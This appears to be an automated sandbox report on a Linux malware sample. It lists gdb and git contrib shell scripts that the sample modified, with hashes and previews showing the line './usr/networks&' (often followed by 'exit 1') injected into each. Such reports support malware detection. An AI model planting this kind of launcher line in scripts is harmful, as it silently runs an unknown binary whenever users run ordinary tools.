                                                                                                                                SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                                                SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                                /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):253
                                                                                                                                Entropy (8bit):5.267626424494032
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                                                MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                                                SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                                                SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                                                SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1048
                                                                                                                                Entropy (8bit):4.806462537404251
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                                                MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                                                SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                                                SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                                                SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                                /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:OS/2 REXX batch file, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21942
                                                                                                                                Entropy (8bit):5.106661772210516
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                                                MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                                                SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                                                SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                                                SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                                /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4825
                                                                                                                                Entropy (8bit):5.113528532566079
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                                MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                                SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                                SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                                SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                                /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11759
                                                                                                                                Entropy (8bit):5.2205279036587235
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                                MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                                SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                                SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                                SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                                /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13843
                                                                                                                                Entropy (8bit):5.402105827507175
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                                MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                                SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                                SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                                SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                                /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5954
                                                                                                                                Entropy (8bit):5.053117199381536
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                                MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                                SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                                SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                                SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                                /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):61
                                                                                                                                Entropy (8bit):4.0161977906092705
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                                MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                                SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                                SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                                SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):234
                                                                                                                                Entropy (8bit):4.9965164312586925
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                                MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                                SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                                SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                                SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2436
                                                                                                                                Entropy (8bit):5.153713997451705
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                                MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                                SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                                SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                                SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                                /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):247
                                                                                                                                Entropy (8bit):4.532049748049262
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                                MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                                SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                                SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                                SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12742
                                                                                                                                Entropy (8bit):5.053935136942481
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                                MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                                SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                                SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                                SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                                /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4349
                                                                                                                                Entropy (8bit):4.9994650554848405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                                                MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                                                SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                                                SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                                                SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                                /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2499
                                                                                                                                Entropy (8bit):5.168731776130111
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                                                MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                                                SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                                                SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                                                SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                                                Malicious:false
